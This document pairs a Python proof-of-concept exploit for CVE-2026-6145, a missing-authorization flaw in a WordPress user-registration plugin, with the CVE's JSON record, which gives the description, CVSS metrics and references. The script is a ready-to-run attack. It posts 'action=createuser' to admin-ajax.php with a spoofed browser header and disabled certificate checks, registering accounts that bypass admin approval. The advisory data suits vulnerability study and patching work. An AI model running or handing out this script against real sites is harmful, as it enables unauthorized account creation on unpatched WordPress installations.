CVE-2026-6145

#!/usr/bin/env python3 import requests def exploit_cve_2026_6145(target_url, username, email): """ PoC for CVE-2026-6145: Missing Authorization in User Registration Plugin. This script attempts to register a user without admin approval by injecting the 'action=createuser' parameter. """ # The endpoint might vary based on installation, usually /wp-admin/admin-ajax.php or a specific registration endpoint # This assumes a standard registration form endpoint structure for the plugin endpoint = f"{target_url}/wp-admin/admin-ajax.php" payload = { "action": "createuser", # The vulnerable parameter that bypasses approval "ur_user_login": username, "ur_user_email": email, # Additional required fields might be needed depending on form configuration } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded", "Referer": target_url } try: response = requests.post(endpoint, data=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Request sent to {endpoint}") print(f"[+] Response: {response.text[:200]}") print("[+] Check if user was created without approval.") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Example usage target = "http://example-wordpress-site.com" user = "attacker_user" mail = "[email protected]" exploit_cve_2026_6145(target, user, mail)

{"cve": {"id": "CVE-2026-6145", "sourceIdentifier": "[email protected]", "published": "2026-05-14T09:16:26.290", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The User Registration & Membership plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.1.5. This is due to the is_admin_creation_process() method relying solely on the presence of action=createuser in the $_REQUEST superglobal without performing any authentication or capability check. This makes it possible for unauthenticated attackers to bypass the admin approval requirement when registering new accounts via the fallback submission path."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3516468/user-registration/trunk/includes/class-ur-user-approval.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b6b349f2-24c9-4921-bb5f-a7726ebc5c2a?source=cve", "source": "[email protected]"}]}}